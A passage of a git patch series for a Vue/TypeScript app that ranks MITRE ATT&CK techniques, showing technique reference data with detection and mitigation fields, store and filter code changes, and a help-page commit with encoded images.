"https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ], + "cumulative_score": 0.20494285714285712, + "adjusted_score": 0.20494285714285712, + "has_car": false, + "has_sigma": false, + "has_es_siem": true, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [ + "AC-2", + "AC-3", + "AC-4", + "AC-5", + "AC-6", + "CM-5", + "CM-6", + "CM-7", + "IA-2", + "SC-18", + "SC-2", + "SC-3", + "SC-34", + "SC-39", + "SC-7", + "SI-16", + "SI-2", + "SI-3", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": true, + "hardware_coverage": true + }, + { + "tid": "T1612", + "name": "Build Image on Host", + "description": "Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote build request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)\n\nAn adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. ", + "url": "https://attack.mitre.org/techniques/T1612", + "tactics": [ + "Defense Evasion" + ], + "detection": "Monitor for unexpected Docker image build requests to the Docker daemon on hosts in the environment. Additionally monitor for subsequent network communication with anomalous IPs that have never been seen before in the environment that indicate the download of malicious code.", + "platforms": [ + "Containers" + ], + "data_sources": [ + "Image: Image Creation", + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1035", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "url": "https://attack.mitre.org/mitigations/M1035" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1613", + "name": "Container and Resource Discovery", + "description": "Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.\n\nThese resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs.(Citation: Docker API)(Citation: Kubernetes API) In Docker, logs may leak information about the environment, such as the environment’s configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversary’s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution. ", + "url": "https://attack.mitre.org/techniques/T1613", + "tactics": [ + "Discovery" + ], + "detection": "Establish centralized logging for the activity of container and Kubernetes cluster components. This can be done by deploying logging agents on Kubernetes nodes and retrieving logs from sidecar proxies for application pods to detect malicious activity at the cluster level.\n\nMonitor logs for actions that could be taken to gather information about container infrastructure, including the use of discovery API calls by new or unexpected users. Monitor account activity logs to see actions performed and activity associated with the Kubernetes dashboard and other web applications. ", + "platforms": [ + "Containers" + ], + "data_sources": [ + "Application Log: Application Log Content", + "Cluster: Cluster Metadata", + "Container: Container Enumeration", + "Container: Container Metadata", + "Pod: Pod Enumeration", + "Pod: Pod Metadata" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1035", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "url": "https://attack.mitre.org/mitigations/M1035" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ], + "cumulative_score": 0.1312095238095238, + "adjusted_score": 0.1312095238095238, + "has_car": false, + "has_sigma": false, + "has_es_siem": true, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [ + "AC-17", + "AC-2", + "AC-3", + "AC-6", + "CM-6", + "CM-7", + "IA-2", + "SC-43", + "SC-7", + "SI-4" + ], + "process_coverage": false, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": true, + "hardware_coverage": false + }, + { + "tid": "T1614", + "name": "System Location Discovery", + "description": "\nAdversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nAdversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)\n\nAdversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)", + "url": "https://attack.mitre.org/techniques/T1614", + "tactics": [ + "Discovery" + ], + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW to gather information.(Citation: FBI Ragnar Locker 2020)\n\nMonitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.", + "platforms": [ + "IaaS", + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "Instance: Instance Metadata", + "Process: OS API Execution", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1614.001", + "name": "System Location Discovery: System Language Discovery", + "url": "https://attack.mitre.org/techniques/T1614/001", + "description": "Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host. This information may be used to shape follow-on behaviors, including whether the adversary infects the target and/or attempts specific actions. This decision may be employed by malware developers and operators to reduce their risk of attracting the attention of specific law enforcement agencies or prosecution/scrutiny from other entities.(Citation: Malware System Language Check)\n\nThere are various sources of data an adversary could use to infer system language, such as system defaults and keyboard layouts. Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Query Registry](https://attack.mitre.org/techniques/T1012) and calls to [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: CrowdStrike Ryuk January 2019) \n\nFor example, on a Windows system adversaries may attempt to infer the language of a system by querying the registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language or parsing the outputs of Windows API functions GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetKeyboardLayoutList and GetUserDefaultLangID.(Citation: Darkside Ransomware Cybereason)(Citation: Securelist JSWorm)(Citation: SecureList SynAck Doppelgänging May 2018)\n\nOn a macOS or Linux system, adversaries may query locale to retrieve the value of the $LANG environment variable.", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system language information. This may include calls to various API functions and interaction with system configuration settings such as the Windows Registry.", + "mitigations": [] + } + ], + "mitigations": [], + "cumulative_score": 0.1255047619047619, + "adjusted_score": 0.1255047619047619, + "has_car": false, + "has_sigma": false, + "has_es_siem": true, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1615", + "name": "Group Policy Discovery", + "description": "Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predicable network path \\\\SYSVOL\\\\Policies\\.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)\n\nAdversaries may use commands such as gpresult or various publicly available PowerShell functions, such as Get-DomainGPO and Get-DomainGPOLocalGroup, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit.", + "url": "https://attack.mitre.org/techniques/T1615", + "tactics": [ + "Discovery" + ], + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor for suspicious use of gpresult. Monitor for the use of PowerShell functions such as Get-DomainGPO and Get-DomainGPOLocalGroup and processes spawning with command-line arguments containing GPOLocalGroup.\n\nMonitor for abnormal LDAP queries with filters for groupPolicyContainer and high volumes of LDAP traffic to domain controllers. Windows Event ID 4661 can also be used to detect when a directory service has been accessed.", + "platforms": [ + "Windows" + ], + "data_sources": [ + "Active Directory: Active Directory Object Access", + "Command: Command Execution", + "Network Traffic: Network Traffic Content", + "Process: Process Creation", + "Script: Script Execution" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [], + "cumulative_score": 0.18976190476190477, + "adjusted_score": 0.18976190476190477, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1619", + "name": "Cloud Storage Object Discovery", + "description": "Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.\n\nCloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .", + "url": "https://attack.mitre.org/techniques/T1619", + "tactics": [ + "Discovery" + ], + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained. \nMonitor cloud logs for API calls used for file or object enumeration for unusual activity. ", + "platforms": [ + "IaaS" + ], + "data_sources": [ + "Cloud Storage: Cloud Storage Access", + "Cloud Storage: Cloud Storage Enumeration" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ], + "cumulative_score": 0.1198, + "adjusted_score": 0.1198, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [ + "AC-17", + "AC-2", + "AC-3", + "AC-5", + "AC-6", + "CM-5", + "IA-2" + ], + "process_coverage": false, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": true, + "hardware_coverage": false + }, + { + "tid": "T1620", + "name": "Reflective Code Loading", + "description": "Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk. Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).(Citation: Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL)\n\nReflective code injection is very similar to [Process Injection](https://attack.mitre.org/techniques/T1055) except that the “injection” loads code into the processes’ own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks)", + "url": "https://attack.mitre.org/techniques/T1620", + "tactics": [ + "Defense Evasion" + ], + "detection": "Monitor for code artifacts associated with reflectively loading code, such as the abuse of .NET functions such as Assembly.Load() and [Native API](https://attack.mitre.org/techniques/T1106) functions such as CreateThread(), memfd_create(), execve(), and/or execveat().(Citation: 00sec Droppers)(Citation: S1 Old Rat New Tricks)\n\nMonitor for artifacts of abnormal process execution. For example, a common signature related to reflective code loading on Windows is mechanisms related to the .NET Common Language Runtime (CLR) -- such as mscor.dll, mscoree.dll, and clr.dll -- loading into abnormal processes (such as notepad.exe). Similarly, AMSI / ETW traces can be used to identify signs of arbitrary code execution from within the memory of potentially compromised processes.(Citation: MDSec Detecting DOTNET)(Citation: Introducing Donut)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Module: Module Load", + "Process: OS API Execution", + "Script: Script Execution" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [], + "cumulative_score": 0.1255047619047619, + "adjusted_score": 0.1255047619047619, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + } +] \ No newline at end of file diff --git a/src/stores/calculator.store.ts b/src/stores/calculator.store.ts index e799783..b703c54 100644 --- a/src/stores/calculator.store.ts +++ b/src/stores/calculator.store.ts @@ -1,15 +1,15 @@ import { defineStore } from "pinia"; -import json from "../data/TopAttackTechniques.json"; +import json from "../data/Techniques.json"; +import type { Technique } from "@/data/DataTypes"; export const useCalculatorStore = defineStore("calculator", { state: () => ({ - myJson: json, - techniques: [], + techniques: json as Array, activeFiltersObj: { - nist: [], - cis: [], - detection: [], - os: [], + nist: [] as Array, + cis: [] as Array, + detection: [] as Array, + os: [] as Array, }, // todo: set NIST, CIS, and OS options from the technique data filterPropertiesObj: [ @@ -59,17 +59,88 @@ export const useCalculatorStore = defineStore("calculator", { }, }, actions: { - updateActiveFilters(filterValues) { + updateActiveFilters(filterValues: { + nist: []; + cis: []; + detection: []; + os: []; + }) { this.activeFiltersObj = filterValues; }, - updateSystemScores(scores) { + updateSystemScores(scores: { + network: { label: string; value: number }; + process: { label: string; value: number }; + file: { label: string; value: number }; + cloud: { label: string; value: number }; + hardware: { label: string; value: number }; + }) { this.systemScoreObj = scores; }, - setTechniques() { - this.techniques = this.myJson; - }, - removeTechnique(index) { + removeTechnique(index: number) { this.techniques.splice(index, 1); }, + setFilters() { + // set filter options from technique values + const platforms = new Set(); + const nist = new Set(); + const cis = new Set(); + const platform_array = [] as Array<{ + id: string; + name: string; + value: boolean; + }>; + const cis_array = [] as Array<{ + id: string; + name: string; + value: boolean; + }>; + const nist_array = [] as Array<{ + id: string; + name: string; + value: boolean; + }>; + // get all unique filter values for each category by adding to set objects + for (const t of this.techniques) { + if (t.platforms) { + t.platforms.forEach((i) => platforms.add(i)); + } + if (t.nist_controls) { + t.nist_controls.forEach((i) => nist.add(i)); + } + if (t.cis_controls) { + t.cis_controls.forEach((i) => cis.add(i)); + } + } + // convert sets to array objects in checkbox format and remove undefined values + for (const platform of platforms) { + if (platform) { + platform_array.push({ id: platform, name: platform, value: false }); + } + } + for (const item of cis) { + if (item) { + cis_array.push({ id: item, name: item, value: false }); + } + } + for (const item of nist) { + if (item) { + nist_array.push({ id: item, name: item, value: false }); + } + } + // sort filter arrays alphabetically + nist_array.sort((a, b) => + a.name.localeCompare(b.name, "en", { numeric: true }) + ); + cis_array.sort((a, b) => + a.name.localeCompare(b.name, "en", { numeric: true }) + ); + platform_array.sort((a, b) => + a.name.localeCompare(b.name, "en", { numeric: true }) + ); + // update filter object with list of all nist, cis, and os options + this.filterPropertiesObj[0].options = nist_array; + this.filterPropertiesObj[1].options = cis_array; + this.filterPropertiesObj[3].options = platform_array; + }, }, }); diff --git a/src/stores/example.store.ts b/src/stores/example.store.ts deleted file mode 100644 index 96d47a1..0000000 --- a/src/stores/example.store.ts +++ /dev/null @@ -1,6 +0,0 @@ -import { defineStore } from "pinia"; - -export const useExampleStore = defineStore("example", () => { - const name = "Top ATT&CK Techniques"; - return { name }; -}); diff --git a/src/views/TopTenResults.vue b/src/views/TopTenResults.vue index 0639b3f..ba39de6 100644 --- a/src/views/TopTenResults.vue +++ b/src/views/TopTenResults.vue @@ -54,7 +54,6 @@ export default defineComponent({ }, computed: { rankedList() { - this.calculatorStore.setTechniques() return this.calculatorStore.techniques } }, From b027204c545a1206353d58d20fa37c977717f899 Mon Sep 17 00:00:00 2001 From: Allison Robbins Date: Thu, 16 May 2024 13:02:23 -0400 Subject: [PATCH 06/21] TAT-144 apply scores and filters to technique list (#13) * feat(TAT-144): Add select/deselect all functionality to NIST and CIS and apply scores to sort technique list * feat(TAT-144): handle technique list less than ten items * feat(TAT-144): apply system scores and filters to sorted top 10 list of techniques * refactor(TAT-144): restructure filterPropertiesObject to synchronize variables, misc code improvements * refactor(TAT-144): restructure select all to be an empty set if all filters are selected * refactor(TAT-144): rework select all display for filters * refactor(TAT-144): define props as required or default * refactor(144): removing unnecessary if statements in filter logic --------- Co-authored-by: arobbins --- scripts/update_techniques.js | 5 +- src/components/CalculatorFilters.vue | 47 +- src/components/SystemScoreSection.vue | 10 +- src/components/TopTenAccordion.vue | 20 +- src/components/TopTenSidebar.vue | 20 +- src/data/Calculator.xlsx | Bin 1654661 -> 1650048 bytes src/data/Techniques.json | 1856 ++++++++++++++++++------- src/stores/calculator.store.ts | 43 +- src/views/TopTenResults.vue | 85 +- 9 files changed, 1566 insertions(+), 520 deletions(-) diff --git a/scripts/update_techniques.js b/scripts/update_techniques.js index 537dd27..59816b0 100644 --- a/scripts/update_techniques.js +++ b/scripts/update_techniques.js @@ -110,7 +110,10 @@ const DESTINATION_FILE = "src/data/Techniques.json"; technique.has_splunk = !!r.getCell("Q").value; technique.cis_controls = r.getCell("R").value - ? r.getCell("R").value.toString().split(", ") + ? r + .getCell("R") + .value.toString() + .split(/\s*,\s*/) : []; technique.nist_controls = r.getCell("T").value ? r.getCell("T").value.toString().split(",") diff --git a/src/components/CalculatorFilters.vue b/src/components/CalculatorFilters.vue index 8465971..3f3df78 100644 --- a/src/components/CalculatorFilters.vue +++ b/src/components/CalculatorFilters.vue @@ -1,11 +1,20 @@ From c08a8d1ad7172e21a54f367ec32cd6ea7d41249c Mon Sep 17 00:00:00 2001 From: Allison Robbins Date: Tue, 28 May 2024 16:23:01 -0400 Subject: [PATCH 07/21] feat(TAT-126): Build help page (#14) * feat(TAT-126): add FAQ and step-by-step guide to using the calculator to help page * style(TAT-126): make all router links scroll to top of page (remove error with FAQ link auto scrolling to middle of page) * feat(TAT-126): add icon to links indicating it opens an external site --------- Co-authored-by: arobbins --- src/assets/filter-img.png | Bin 0 -> 30427 bytes src/assets/results-img.png | Bin 0 -> 246942 bytes src/assets/score-img.png | Bin 0 -> 54777 bytes src/router/index.ts | 4 + src/views/HelpPage.vue | 161 ++++++++++++++++++++++++++++++++++++- 5 files changed, 161 insertions(+), 4 deletions(-) create mode 100644 src/assets/filter-img.png create mode 100644 src/assets/results-img.png create mode 100644 src/assets/score-img.png diff --git a/src/assets/filter-img.png b/src/assets/filter-img.png new file mode 100644 index 0000000000000000000000000000000000000000..8423c695c588a26440a0513f27bf2616e56df1c4 GIT binary patch literal 30427 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 